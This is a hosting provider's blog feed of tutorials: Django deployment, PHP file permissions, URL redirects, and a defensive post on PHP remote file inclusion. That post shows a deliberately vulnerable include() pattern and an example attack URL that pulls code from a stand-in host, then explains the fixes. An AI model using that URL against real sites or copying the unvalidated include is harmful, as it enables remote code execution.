Tips & Tricks – NearlyFreeSpeech.NET Blog
https://blog.nearlyfreespeech.net
A blog from the staff at NearlyFreeSpeech.NET.
Mon, 17 Nov 2014 00:47:37 +0000

How-To: Django on NearlyFreeSpeech.NET
https://blog.nearlyfreespeech.net/2014/11/17/how-to-django-on-nearlyfreespeech-net/
Mon, 17 Nov 2014 00:18:38 +0000

Now that our persistent process feature is out of beta, this is the first in a series of brief tutorials designed to show how to make use of the feature. In this example, we’ll deploy a minimal Django site using WSGI. Although a lot of this is specific to Django, it also demonstrates most of the steps you would use with other frameworks, like Node.JS or Ruby on Rails. (And we’ll be adding how-to articles for those in the future.)

Getting your site ready for Django

First, create the site. When you get to the “Server Type” panel, select the “[Production] Apache 2.4 Generic” option.

[Screenshot: ServerType]

(You can also use the “[Production] Custom” option; it’s faster if you want Django to serve the whole site, but in this example, we’re also going to demonstrate how to let our Apache server handle a directory of static images.)

Once that’s done, you’ll immediately notice the new “Daemons” and “Proxies” boxes on the site info panel:

[Screenshot: DaemonsAndProxies]

but you can ignore those for now. We’ll get back to them.

If it’s still 2014 when you read this, our base Django environment hasn’t been around very long, so it hasn’t had time to work its way into the default realm for new sites. (That’ll be happening in January 2015, so if you’re reading this in the future, you may be able to skip this step. Also, hello future, please send lotto numbers!) So for now you’ll need to update your site realm to indigo or white to get the newest code. Just click the “Edit” button on the “CGI/SSH Realm” line of your site’s Config Information box:

[Screenshot: ConfigInformation]

And choose the “indigo” or “white” realm. For this article, we’ll use the indigo realm:

[Screenshot: SiteRealm]

Install Django via ssh

Next, log into the ssh server to set up the actual Django app.


$ ssh jdw_django@nfsnssh
[django /home/public]$ mkdir images
[django /home/public]$ cd /home/protected
[django /home/protected]$ mkdir django
[django /home/protected]$ cd django/
[django /home/protected/django]$ django-admin startproject helloworld .
[django /home/protected/django]$ python manage.py migrate
Operations to perform:
Apply all migrations: admin, contenttypes, auth, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying sessions.0001_initial... OK
[django /home/protected/django]$ cd ..

If you were expecting a bunch of stuff here involving Python’s virtualenv feature, you can totally do that if you want. It’s handy if you need a bunch of Python modules we don’t provide. We don’t need it for this article, but if you need it, you probably already know what it is, how it works, and where to insert it into the steps above.

Next, we need a run script. A run script is how our system starts your daemon. You can use it to customize command line arguments and environment variables (or to jump into a Python virtualenv) before your daemon starts. The main thing to be aware of with run scripts is that they need to run the actual daemon in the foreground, which can sometimes be tricky. But that’s how Django rolls anyway, so we won’t have any problems there.

You can use whatever text editor you want to create your run script. (Just make sure if you create it on Windows that it winds up with Unix line endings.) Ordinarily I would use the one true editor (vi) at this point, but the run script is very simple and vi isn’t photogenic, so we’ll just enter it directly:


[django /home/protected]$ cat >run-django.sh <<NFSN_FEEL_THE_POWER
> #!/bin/sh
> exec python manage.py runserver
> NFSN_FEEL_THE_POWER
[django /home/protected]$ chmod a+x run-django.sh

At this point, Django is pretty much set up. If you want to prove it, you can try running it from the command line:


[django /home/protected]$ cd django/
[django /home/protected/django]$ ../run-django.sh
Performing system checks...

System check identified no issues (0 silenced).
November 16, 2014 - 21:36:18
Django version 1.7, using settings 'helloworld.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.

Now, the ssh server is a restricted environment, so you can’t access anything running there from anywhere but there. So we can open another ssh window to check it out:


[django /home/public]$ curl -i http://localhost:8000/
HTTP/1.0 200 OK
Date: Sun, 16 Nov 2014 21:39:04 GMT
Server: WSGIServer/0.1 Python/2.7.8
Vary: Cookie
X-Frame-Options: SAMEORIGIN
Content-Type: text/html

<!DOCTYPE html>
... blah blah blah ...
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
... blah blah blah ...

Looks good! So now we can close the second ssh window, and go back to the first one where we’ll see our footprints:


[16/Nov/2014 21:39:04] "GET / HTTP/1.1" 200 1759

From there, follow the instructions to quit the server (hit CONTROL-C). But leave this ssh session around. We’ll come back to it later.

Now, we’ve got to tell our system about Django, so it will get started (and, if ever necessary, restarted). Back to the UI!

Telling our system about Django

First, we’ll add a Daemon for Django from the Site Information panel in the member interface:

[Screenshot: AddDaemon]

Shocking no one, this will need some configuration:

[Screenshot: AddDaemonOptions]

The tag is just a short name for the daemon. Tags are unique on a per-site basis, so everybody can have a django of their very own, but only one per site. (If for some reason you needed another, there’s nothing wrong with django2.) It’ll also need to know the name of the run script we created and where to run it from. In this case, we want to be inside the Django directory so the run script will be able to find manage.py. And we run it as the web user, which is what you should always do for a daemon that serves web pages. (Other types of daemons, like custom databases, should probably run as “me.”)

Next, we’ll have to add two proxy entries, one to send most of the site’s traffic to Django, and one to exclude some static files we don’t want Django to handle.

The first proxy entry will send most of the site’s requests to Django. It’s added from the Site Information Panel:

[Screenshot: AddFirstProxy]

And configured like this:

[Screenshot: AddFirstProxyOptions]

Python takes care of mapping HTTP to WSGI for us, so this is an HTTP proxy. It’s handling the whole site, so the base URI is /. The document root value is usually / unless your custom server needs something different. (For example, PHP-FPM wants the absolute path to your site’s top-level PHP files.) Any port from 1024 to 65535 can be used as long as the same value is used both in our UI and in the configuration of the daemon. We’ll use 8000 for the target port because that’s what Django already said it wanted when we ran it on the ssh server above. And unlike the ssh server, you don’t have to worry about what anyone else is doing. Every site can use whatever ports are needed in this range.
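Before filling in the proxy form, it can help to confirm that the port is in the allowed range and that something is actually listening on it. The following is only a sketch: the function names are made up for this illustration, and only the 1024 to 65535 range and port 8000 come from the text above.

```python
import socket

# Port range usable for a proxy target, per the text above.
MIN_PORT = 1024
MAX_PORT = 65535


def is_valid_proxy_port(port):
    """Return True if port falls in the range usable for a proxy target."""
    return MIN_PORT <= port <= MAX_PORT


def is_listening(host, port, timeout=1.0):
    """Return True if something accepts TCP connections on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, timed out, or host not reachable.
        return False


if __name__ == "__main__":
    port = 8000  # the port Django's runserver announced earlier
    print("valid port:", is_valid_proxy_port(port))
    print("daemon listening:", is_listening("127.0.0.1", port))
```

Run next to a live runserver, the second check should report True; with nothing running it simply reports False rather than raising.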

If we wanted Django to handle absolutely the whole site, we’d use the “Direct” option to bypass Apache entirely. That’s faster and scales better, so it’s often a good choice. Our network will still automatically reverse proxy your static content whenever possible, so it doesn’t much matter that Django isn’t optimized for that.

But here we want to exclude the /images/ directory, so it doesn’t get sent to Django. To do this, we’ll leave Direct unchecked, add that proxy, and then go back to the Site Information panel to add a second entry:

[Screenshot: AddSecondProxy]

And configure it as a “none” option, which tells our system to send requests for some URLs back through Apache to a directory under public:

[Screenshot: AddSecondProxyOptions]

In this case, we want /images/ to point to the “images” directory we created in /home/public way back at the beginning, so both paths will be “/images/” as shown. The port value doesn’t matter for a “none” proxy; it won’t be used.
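One way to picture the combined effect of the two proxy entries is longest-prefix matching on the base URI. The sketch below is only a model of the behavior described here, assuming the most specific base URI wins; it is not how the hosting system is actually implemented, and the "django" and "apache" labels are invented for the example.

```python
# Proxy entries as configured in this article: (base URI, destination label).
PROXIES = [
    ("/", "django"),         # HTTP proxy to the daemon on port 8000
    ("/images/", "apache"),  # "none" proxy: served by Apache from public/images
]


def route(path, proxies=PROXIES):
    """Pick the destination whose base URI is the longest matching prefix."""
    matches = [(base, dest) for base, dest in proxies if path.startswith(base)]
    if not matches:
        return None
    # The most specific (longest) base URI wins.
    return max(matches, key=lambda entry: len(entry[0]))[1]


if __name__ == "__main__":
    for p in ["/", "/admin/", "/images/logo.png"]:
        print(p, "->", route(p))
```

Under this model, only paths below /images/ reach Apache; everything else goes to Django.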

D’Artagnan!

Once this is all done, Django is ready to spring into action. Our UI should look like this:

[Screenshot: DjangoUIFinal]

And the live site looks like this:

[Screenshot: DjangoSite]

(Assuming you use an improbably small but conveniently-screenshot-sized browser window. Also note that we served the image above from the Django site’s static images directory we set up.)

Of course, when it says “you haven’t actually done any work yet,” it’s understating the case a little. Setting up Django isn’t effortless, but it is pretty easy.

Interacting with your pet Daemon

Now, if we head back to ssh, we can interact with our daemon a bit. First, we’ll check out its output. This is particularly helpful for troubleshooting a run script in case your daemon won’t start.


[django /home/public/images]$ cd /home/logs
[django /home/logs]$ ls
daemon_django.log
[django /home/logs]$ cat daemon_django.log
[16/Nov/2014 22:05:41] "GET / HTTP/1.1" 200 1759
[16/Nov/2014 22:05:42] "GET /favicon.ico HTTP/1.1" 404 1935
[16/Nov/2014 22:33:40] "GET / HTTP/1.1" 200 1759
[16/Nov/2014 22:56:45] "GET / HTTP/1.1" 200 1759

But you can also connect to your daemon if you want.


[django /home/logs]$ curl -i http://django.local:8000/
HTTP/1.0 200 OK
Date: Sun, 16 Nov 2014 23:37:39 GMT
Server: WSGIServer/0.1 Python/2.7.8
Vary: Cookie
X-Frame-Options: SAMEORIGIN
Content-Type: text/html

... blah blah blah ...

This isn’t super-useful for Django, but it’s handy for other processes like databases, so you can connect to them with admin tools. Just change “django” to your actual site’s short name as shown in our UI.
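The same check can be scripted. This is a minimal sketch, assuming Python 3 (the transcript above shows Python 2.7, where the import would differ); the helper names are invented here, and the fetch only works from the ssh server, where the .local name resolves.

```python
from urllib.request import urlopen


def daemon_url(short_name, port, path="/"):
    """Build the internal URL for a daemon, e.g. http://django.local:8000/."""
    return "http://{}.local:{}{}".format(short_name, port, path)


def fetch_status(url, timeout=5):
    """Return the HTTP status code for url."""
    with urlopen(url, timeout=timeout) as response:
        return response.status


if __name__ == "__main__":
    url = daemon_url("django", 8000)
    print(url)
    # Uncomment on the ssh server, where the .local name resolves:
    # print(fetch_status(url))
```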

From here, the next step is to create an amazing and cool Django-powered site hosted on our service. That is left as an exercise for the reader.

If you want to learn more about Django, check out the DjangoGirls tutorial. (Also works for boys.) If you’ve done all the steps above, you can try picking up their tutorial here.

That’s it for this intro to the persistent process feature. Next time, Node.JS!

A PHP Include Exploit Explained
https://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
Thu, 05 Nov 2009 05:37:10 +0000

We are having a fairly consistent problem with spammers auto-exploiting a very common type of scripting vulnerability that appears on our members’ sites. Unlike most vulnerabilities that stem from a faulty version of some app a lot of people use, this one crops up primarily on sites containing PHP code that people write themselves.

Cleaning up the resulting messes is getting a little tedious and so, even though this is hardly a new exploit, I wanted to write a little bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe.

Let’s start with the problem code. If you’ve written a PHP script on your site that contains code similar to the below, you’re probably vulnerable:

$page = $_GET['page'] . ".php";
include($page);

A lot of people seem to use code like this. If they call this script exploitme.php, then the URLs for these types of sites wind up looking like this:

http://example.nfshost.com/exploitme.php?page=main
http://example.nfshost.com/exploitme.php?page=contact
http://example.nfshost.com/exploitme.php?page=faq

Then, they put the body of each page into main.php, contact.php, and faq.php. They put the stuff that’s the same on every page in exploitme.php and, presto, instant mini-CMS.

How does this get exploited?

When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this:

http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F

Most people don’t know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn’t even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere that the hacker can put a text file.

The “urhacked.txt” file actually contains whatever PHP commands the attacker wants to execute. Typically, this means sending out tons of spam, which comes from the vulnerable site. Spotting the huge email queue from a site that’s never sent email in its life is usually how we find out about it. But that’s not all they can do; this is an “arbitrary code” exploit. They can do whatever they want using the same privileges the exploited page has. Security researchers call exploits of this type the confused deputy problem.

What makes this particular vulnerability even worse is that it’s possible to detect and exploit automatically. Attackers are smart enough to query search engines for lists of pages with links embedded in the format shown above. All their attack script needs to do is identify the URL of your page and the name of the variable used to hold the target page.

This is a problem because a whole lot of people think “no one bad will ever find or bother trying to exploit my little site.” They don’t realize that it’s no bother; it’s done completely automatically. If you’ve got a vulnerability like this, getting exploited is not “if,” it’s “when.”

Also, the %3F at the end of the attacker’s “page” value decodes into a question mark. This is because the attacker assumes the site will add .php or something to the name they give it to get the filename to load. So the URL that the site winds up loading looks like this:

http://badsite.example.com/urhacked.txt?.php

Assuming that urhacked.txt is a static file, the ? and everything after it will be discarded and the malicious contents will be returned no matter what the site adds at the end.
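The decoding step is easy to reproduce outside PHP. The sketch below (Python 3, standard library only) replays what happens to the attacker’s “page” value; it illustrates the string handling and is not the vulnerable PHP code itself.

```python
from urllib.parse import unquote, urlsplit

# The "page" value from the attack URL above, still percent-encoded.
raw_page = "http://badsite.example.com/urhacked.txt%3F"

# Decoding the query string value turns %3F into "?".
page = unquote(raw_page)

# The vulnerable script then appends ".php" before calling include().
included = page + ".php"

parts = urlsplit(included)
print(included)     # http://badsite.example.com/urhacked.txt?.php
print(parts.path)   # /urhacked.txt
print(parts.query)  # .php
```

The appended .php lands in the query string, so the path the remote server sees is still /urhacked.txt.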

How to prevent it?

Our default permissions and user/group setup prevent a lot of these from getting worse; by default the attacker cannot execute system commands, create, remove, or (worse) edit files. But the attackers can (and do) send spam. And they can read any files on your site that contain stuff like database passwords you’d probably rather they didn’t have.

Worse, sometimes people irritated with the complexities of getting permissions and ownership exactly right leave things wide open. When that mindset encounters this vulnerability, the resulting damage to the affected site is usually unrecoverable.

So, the first thing one tends to want to do upon finding out about this is to disable the ability of PHP’s include() function to load files from remote sites. PHP allows this by adding the following to .htaccess:

php_flag allow_url_include false

This is a good start, and definitely something to consider, but one of the authors of the Suhosin PHP security patch explained why that is inadequate some years ago.

The second thing that seems obvious is using file_exists() to make sure the file really exists before trying to load it. But file_exists() works on URLs too. D’oh!

There are two viable ways of eliminating this vulnerability.

The best approach, and the one we recommend, is not to create it in the first place. If you want five PHP pages to share a common header and footer (for example), then reverse the include(). In other words, the URL from the “main” example above:

http://example.nfshost.com/exploitme.php?page=main

changes to reference the main.php file directly:

http://example.nfshost.com/main.php

And then main.php looks like this:

<?php include(".../path/to/header.php"); ?>
The same main page content that was always there.
<?php include("…/path/to/footer.php"); ?>

This way, the exploitme.php script goes away (split into header and footer) and the site never has to trust the user about what belongs inside the very powerful include() statement. Adding a couple of lines (at most) of boilerplate code to each page of content is a small price to pay to eliminate an entire category of security problems.

The second approach is to scrupulously validate the inputs before acting on them. Unfortunately it’s very easy to get this wrong. So to help people get it right, we’re going to walk through the four necessary steps. (All four are essential; skip any one and the whole exercise becomes an elaborate waste of time.) They are:

  1. Examine and reject any input that isn’t entirely formed of “friendly” characters (e.g. letters and numbers).
  2. Put the “content” files (e.g. main.php, contact.php, faq.php) in a special subdirectory of your site’s “protected” directory.*
  3. Always refer to files handled in this way using absolute paths and/or system environment variables.
  4. Test the existence of the file before you include it.

Here’s a simple example:

$page = $_GET['page'];
if (!preg_match("/^[A-Za-z0-9_]+$/", $page))
    throw new BadPageException("Bad character(s)", $page);
$path = "{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$page}.php";
if (!file_exists($path)) 
    throw new BadPageException("Page not found", $page);
include($path);

class BadPageException extends Exception {
    function __construct($err, $page) {
        $page = urlencode($page);
        if (strlen($page) > 128)
            $page = substr($page, 0, 128) . "…";
        parent::__construct("Error \"{$err}\" on \"{$page}\"");
    }
}

Line 1 retrieves the page name from the query string.
Lines 2-3 abort if it isn’t composed entirely of ASCII letters, numbers, and the underscore (_). (Step 1)
Line 4 maps the page name to a specific filename in a special directory just for these types of pages (Step 2) using an absolute path based on site-independent environment variables (Step 3).
Lines 5-6 abort if the resulting filename doesn’t exist. (Step 4)
Line 7 includes the file.
Lines 9-16 are probably overkill for a “simple” example, but we wanted to show people how to do it right in the real world. When something goes wrong, these lines document the problem. The complexity here comes from “defanging” the requested page name before printing it in an error message. Usually you would want to configure your site to write such messages to its error log, so this protects against 10 pages of gibberish, or codes that will mess up your terminal when you look at it, etc.
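For readers who think more easily in Python, the same four steps can be sketched as follows. This is an analogue written for illustration (Python 3), not a translation anyone should drop into a PHP site; PAGES_DIR is a hypothetical location standing in for the path built from NFSN_SITE_ROOT above, and BadPageError and resolve_page are names invented here.

```python
import os
import re

# Hypothetical location; the PHP example derives it from NFSN_SITE_ROOT.
PAGES_DIR = "/home/protected/pages"

# Step 1 whitelist: ASCII letters, digits, and underscore only.
FRIENDLY = re.compile(r"[A-Za-z0-9_]+")


class BadPageError(Exception):
    """Raised when a requested page name is rejected."""


def resolve_page(page, pages_dir=PAGES_DIR):
    """Apply the four steps and return the absolute path of a page file."""
    # Step 1: the whole name must consist of friendly characters.
    if not FRIENDLY.fullmatch(page):
        raise BadPageError("Bad character(s)")
    # Steps 2 and 3: a dedicated directory, referenced by absolute path.
    path = os.path.join(os.path.abspath(pages_dir), page + ".php")
    # Step 4: the file must exist before anything is done with it.
    if not os.path.isfile(path):
        raise BadPageError("Page not found")
    return path
```

Because the name can never contain a slash, dot, or colon, neither a remote URL nor a ../ path can get past step 1.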

So that’s it, one of the most common classes of exploit explored and examined, complete with working sample code. Please, please, if you code your own PHP, take a few minutes and check to see if your site suffers from this problem. We waste hours every week cleaning up the messes it causes, and we’d sure like to spend that time improving the service instead.

(Commented source available here.)

* For blog guests who may not be members of our service: On our service, each web site has a “public” directory and a “protected” directory. Files in “public” are directly accessible via the web, and files in “protected” are not. The contents of the “protected” directory are, however, accessible to scripts in the “public” directory. I.e., they can be accessed, but only indirectly by accessing the site’s public interface. This makes “protected” a good place to put data, include files, or other stuff that scripts need in order to run, but that you don’t want just anybody to download. The concept and terms are borrowed from object-oriented programming.

Quick WordPress Performance Tip: Create a favicon
https://blog.nearlyfreespeech.net/2009/06/16/quick-wordpress-performance-tip-create-a-favicon/
Tue, 16 Jun 2009 20:10:13 +0000

One of our members’ WordPress blogs got heavily FARKed a bit ago. Alarms went off, and we thought the server was going to crash. That’s pretty unusual, of course, so we looked into it and found something really interesting: the blog’s performance problem was entirely caused by the lack of a favicon.ico file.

To quote Adrian Monk: “Here’s what happened…”

WordPress uses a handful of rewrite rules to present “pretty URLs” to visitors:

RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) - [PT,L]
RewriteRule ^(.*) index.php

These rules say that if the file or directory the visitor is asking for doesn’t exist in the site’s filesystem (as blog entries do not), the request gets pushed into the WordPress engine to be handled. WordPress doesn’t do very well when asked to serve things that do not exist. There are a lot of things that a particular link could be, and it has to check them all before finally erroring out.

Since favicon.ico doesn’t exist but gets requested at least once by everyone who even thinks about visiting the site, it was causing a huge amount of server load to generate all these 404 pages that nobody would ever see.

With the site owner’s permission, we created a zero-length favicon.ico file in the site’s public directory until they could make one themselves, and the problem immediately went away. The change was so immediate and so profound that we felt compelled to blog about it.
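The effect of that one empty file can be modeled in a few lines. The sketch below mimics the decision the rewrite rules make (existing file or directory: serve it directly; anything else: hand it to index.php) and shows how creating a zero-length favicon.ico changes the outcome. Both function names are invented for this illustration, and the model ignores everything else Apache does.

```python
import os


def handler_for(public_dir, request_path):
    """Mimic the rewrite rules: existing files and directories are served
    directly; everything else falls through to index.php."""
    target = os.path.join(public_dir, request_path.lstrip("/"))
    if os.path.isfile(target) or os.path.isdir(target):
        return "static"
    return "index.php"


def ensure_favicon(public_dir):
    """Create a zero-length favicon.ico if none exists; return its path."""
    path = os.path.join(public_dir, "favicon.ico")
    if not os.path.exists(path):
        # Opening for writing and closing immediately leaves an empty file.
        open(path, "wb").close()
    return path
```

Before ensure_favicon() runs, handler_for(public_dir, "/favicon.ico") reports index.php; afterwards it reports static, which is the cheap path.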

While this happened on WordPress, it’s worth remembering for any application or custom code that drives every incoming request into a PHP or CGI handler. Everybody who visits your site (and some people who don’t) will request /favicon.ico, so make sure you know what happens when they do.

Preferably before FARK and company get ahold of it! 🙂

Surprise WordPress Upgrade
https://blog.nearlyfreespeech.net/2008/04/08/surprise-wordpress-upgrade/
Tue, 08 Apr 2008 04:30:21 +0000

We received a note from Technorati today about a serious security problem with old versions of WordPress, including the version we were running, that is now being exploited on a widespread scale. We’ve thus hastily upgraded to WordPress 2.5. That did cause a brief bit of disruption to the “News & Announcements” portion of our member site, which is now resolved.

If you want to run WordPress, you too may want to check whether you’re running the most current version with the latest patches. Better safe than sorry!

Writing files in PHP
https://blog.nearlyfreespeech.net/2007/01/28/writing-files-in-php/
Sun, 28 Jan 2007 18:08:24 +0000

The “traditional” web server just reads and sends out files in response to incoming requests. Consequently, the standard security configuration is set up to give web accesses the bare minimum in terms of file permissions: the ability to read the site’s files, but not to change them.

But many PHP applications want to write files as well: forums that support uploading files, CMS applications, and many Wikis all create or update files as a normal part of their operation. Since the default permissions don’t allow it, many people run into trouble when trying to develop or install PHP applications that need this ability. This blog post will attempt to show how to do this on our system in a way that is easy to set up and very secure.

On Unix systems like ours, each file has two owners: a user and a group. On our system, the user who owns your files is usually identified to you as “me” and the web server runs as user “web.” Similarly, there are two groups: “me” and “web.” When you are logged in to the ssh server, your default group is group “me” but you are a member of both “me” and “web.” The web server, on the other hand, is limited to the “web” group.

PHP safe_mode imposes a number of restrictions above and beyond standard Unix filesystem permissions. For the most part, these restrictions are designed to prevent multiple sites on a shared host (like ours) from trampling each other. However, if applied properly, they also provide opportunities for you to limit damage to your own site in the event of a bug or exploitable security flaw.

The secret to using this feature properly is to set the proper group ownership on your PHP scripts. If your PHP script is intended to read and write other files in your web space (or related directories), then the script should be owned by the “web” group.

In order for the web server to write to files or directories in your web space, it needs write permissions. As far as the Unix filesystem goes, there are two ways for it to get that: the file can have group “web” and be group writable, or it can have group “me” and be world writable. However, with PHP, that is not sufficient.

On our system, for PHP to be able to write to a file, the group of the file (or parent directory, if creating a file) must match the group of the PHP script doing the writing. If you want a PHP script to be able to write files, you should take the additional step of setting that script’s group to “web.” You’ll also need to make sure that the destination directory for created files has group “web” and that it is group writable.

If this is set up properly, these two steps form a sort of interlock: you specify which scripts are permitted to write files, you specify where files are permitted to be written, and the only combination that will succeed is if a permitted script tries to write to a permitted location. Everything else is off limits. This effectively protects the rest of your files from being unexpectedly overwritten by your file-writing scripts, and it prevents other PHP scripts from writing files at all, even if they later turn out to have a security problem that might otherwise allow it.
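The interlock can be written down as a small truth function. This is a simplified model of the rule as described in this post, not PHP’s actual safe_mode code: it assumes the web server runs as user “web” in group “web” only, never owns the target, and it ignores everything except the group name and the permission bits.

```python
import stat


def unix_allows_web_write(target_group, target_mode):
    """Plain Unix check for a process in group "web" that is not the owner."""
    if target_group == "web":
        # The group bits apply when the process belongs to the file's group.
        return bool(target_mode & stat.S_IWGRP)
    # Otherwise the "other" (world) bits apply.
    return bool(target_mode & stat.S_IWOTH)


def php_can_write(script_group, target_group, target_mode):
    """Model of the interlock: Unix must allow it AND the groups must match."""
    return (unix_allows_web_write(target_group, target_mode)
            and script_group == target_group)


if __name__ == "__main__":
    print(php_can_write("web", "web", 0o775))  # permitted script, permitted place
    print(php_can_write("me", "web", 0o775))   # script was not granted write access
    print(php_can_write("web", "web", 0o755))  # destination is not group writable
```

Only the first call succeeds under this model; the other two fail because one half of the interlock is missing.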

It’s also possible to get PHP to write files by setting the target file (or directory) to group “me” and giving it world write permissions. However, doing so forgoes all of the above protection, and so it is not recommended. You can also run into problems with this approach if the PHP script intends to create a directory and then create a file in that directory.

All of our member sites have a “protected” directory at the same level as the “public” (aka “htdocs” for older sites) directory that contains your web-accessible material. The “protected” directory cannot be directly accessed via the web, but it has the appropriate ownership and permissions already set for PHP scripts with group “web” to be able to write files. This makes it an ideal, safe place for your site to store and maintain support files without having to worry about what access controls are needed to prevent visitors from accessing those support files directly over the web.

As a final caveat, make sure the PHP scripts you set to group “web” are not group-writable, because that would grant the server permission to modify the script itself, which is generally undesirable.
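A quick way to audit for this is to look at the group write bit on each script. The sketch below uses only the standard library; the function names are invented for this example, and which files to pass in is up to you.

```python
import os
import stat


def is_group_writable(path):
    """Return True if the file's mode includes the group write bit."""
    return bool(os.stat(path).st_mode & stat.S_IWGRP)


def group_writable_scripts(paths):
    """Return the subset of paths that are group-writable."""
    return [p for p in paths if is_group_writable(p)]
```

Any script this reports can be fixed with chmod g-w on the ssh server.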

Update: As of 2012, this post is five years old. Most of it still applies to “Fast” PHP prior to 5.4. The primary difference is that the synthetic “me” user/group is no longer used; you will instead see a unique numeric username for each site.

Forwarding sites & URL rewriting
https://blog.nearlyfreespeech.net/2006/11/17/forwarding-sites-url-rewriting/
Fri, 17 Nov 2006 05:23:30 +0000

Note: the content of this blog entry is deprecated. Please search our member FAQ for “canonical” for more information about replacement techniques.

We recently got a support inquiry about alternate methods of forwarding visitors from one URL to another.

We have a FAQ entry about using “decoy” sites to forward alternate URLs. This is one method, and probably the easiest, but there are many others that can be useful in different circumstances.

What I’d like to do here is talk about the reasons why we recommend this one and discuss some of the alternatives and when they might be more useful.

The premise of URL forwarding is that a web site should have a single canonical name. Other names might exist, but they’re usually alternate names, or variant spellings, or similar. These names might be common typos you want to catch, easier to type, or whatever. But the actual site accesses should use the canonical name, because that’s best for search engine rankings and long-term recognition of your site.

By far the most common case is when you have a domain name, such as example.com, and you want to use http://www.example.com/ and http://example.com/ to access the site, so that’s the case I’ll focus on here. I’ll also assume that www.example.com is the canonical name of choice. (The temptation to use the bare domain can be very high for some people, but see this FAQ entry for a discussion of reasons why we recommend against it.)

Our FAQ entry suggests creating a forwarding site, assigning example.com to it as an alias, and creating a one-line .htaccess file in its htdocs directory:

RedirectPermanent / http://www.example.com/

We generally recommend creating an alternate site because this is the most efficient approach. With this method, people who enter one of the “wrong” names hit the decoy site and get redirected to the canonical name right up front, and there’s zero extra overhead on any subsequent requests. It’s also really easy to do, and it’s impossible to screw up your working site while setting it up.

Second, we recommend the RedirectPermanent Apache directive for two reasons. The “permanent” redirect code (301) helps keep search engines and the like from continuously trying to index the “wrong” name instead of the right one. Also, the Apache Redirect family works for subordinate URLs. One of the most common redirection mistakes is a setup that will correctly redirect http://example.com/ to http://www.example.com/, but won’t redirect http://example.com/something.html to http://www.example.com/something.html. RedirectPermanent is a one-line solution that handles such cases flawlessly.
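The subordinate-URL behavior comes from the way the Redirect family appends whatever follows the matched prefix to the target. Here is a simplified model of that for a single request; redirect_permanent is a made-up function name, and the model skips details such as Apache only matching on whole path segments.

```python
def redirect_permanent(url_path, target, request_path):
    """Model of `RedirectPermanent url_path target` for one request.

    Returns (301, location) if request_path falls under url_path,
    otherwise None. Whatever follows the matched prefix is appended
    to the target, which is how subordinate URLs get carried over.
    """
    if not request_path.startswith(url_path):
        return None
    remainder = request_path[len(url_path):]
    return (301, target + remainder)


if __name__ == "__main__":
    print(redirect_permanent("/", "http://www.example.com/", "/"))
    print(redirect_permanent("/", "http://www.example.com/", "/something.html"))
```

With url_path set to /, every request matches, so every page on the alternate name lands on the same page under the canonical name.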

One thing that’s come up a couple of times is that once you have a forward for one alternate name, you can add as many other alternate names for the same site as you want. This is easily done by just adding the alternate aliases to the forwarding site.

Now, let’s take a look at an entirely different approach. The ultimate tool for URL rewriting is, of course, the Apache rewrite module, mod_rewrite. It’s possible to use it to accomplish the exact same thing, but without the use of a second site. To do so, you just create an .htaccess file in the site root containing the following:

RewriteEngine on
RewriteCond %{HTTP_HOST} !^www.example.com$ [NC]
RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L]

Here’s how this works in a nutshell:

1) “RewriteEngine on” is needed to enable mod_rewrite.

2) RewriteCond applies a condition under which rewriting will occur. In this case, we want to rewrite if the %{HTTP_HOST} (the content of the HTTP Host: header, which is where the requested domain name lives) does not (the !) match www.example.com from beginning to end (the ^ and $, respectively), without regard to uppercase or lowercase (the [NC]). So this will skip www.example.com and www.ExAmPlE.com but not example.com or any other alias you might want to add.

3) This RewriteRule applies to the whole URL, no matter what it is (the ^.*$), changes it to the correct name (the http://www.example.com) while keeping the same URI path (the %{REQUEST_URI}), sends it back to the client as a 301 redirect (the R=301), and skips any other rewrite rules (the L).
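The three steps above can be sketched as a small function. This is an emulation for illustration only, not how mod_rewrite is implemented; the pattern is the one from the RewriteCond, except that the dots are escaped here so they match only literal dots, and [NC] becomes a case-insensitive regex flag.

```python
import re

CANONICAL_HOST = "www.example.com"
# Same idea as the RewriteCond pattern; [NC] maps to re.IGNORECASE.
CANONICAL_RE = re.compile(r"^www\.example\.com$", re.IGNORECASE)


def rewrite(host, request_uri):
    """Return (301, location) for non-canonical hosts, None otherwise."""
    if CANONICAL_RE.search(host):
        # The negated condition fails, so the rule is skipped.
        return None
    # R=301 with the original path preserved via REQUEST_URI.
    return (301, "http://" + CANONICAL_HOST + request_uri)


if __name__ == "__main__":
    print(rewrite("www.ExAmPlE.com", "/"))
    print(rewrite("example.com", "/something.html"))
    print(rewrite("example.nfshost.com", "/"))
```

The first call returns None (no redirect), while the other two are sent to the canonical name with their paths intact.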

The big potential advantage of this method is that it effectively suppresses the use of the default site names we provide (example.nfshost.com), if that’s important to you. It also doesn’t require the existence of an alternate site, if you find that distasteful for some reason. The disadvantage is the extra overhead, which applies to absolutely every request, whether it’s using a URL that needs rewriting or not. (Also, as I personally don’t care for mod_rewrite, I consider the use of it a fundamental drawback, but that is more bias on my part than a viable objection.)

The specific question we got was about creating a rewrite site that can handle multiple independent destinations. In this situation, you have a large number of names to rewrite to as well as from. In other words, not just redirecting http://example.com/ to http://www.example.com/ but also redirecting http://other.com/ to http://www.other.com/, all from a single site. RedirectPermanent isn’t smart enough to handle that, but mod_rewrite is.

For this approach, create one “generic” forwarding site from the “sites” tab, and create an .htaccess file in that site’s htdocs directory that looks like this:

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example.com$ [NC]
RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L]
RewriteCond %{HTTP_HOST} ^other.com$ [NC]
RewriteRule ^.*$ http://www.other.com%{REQUEST_URI} [R=301,L]

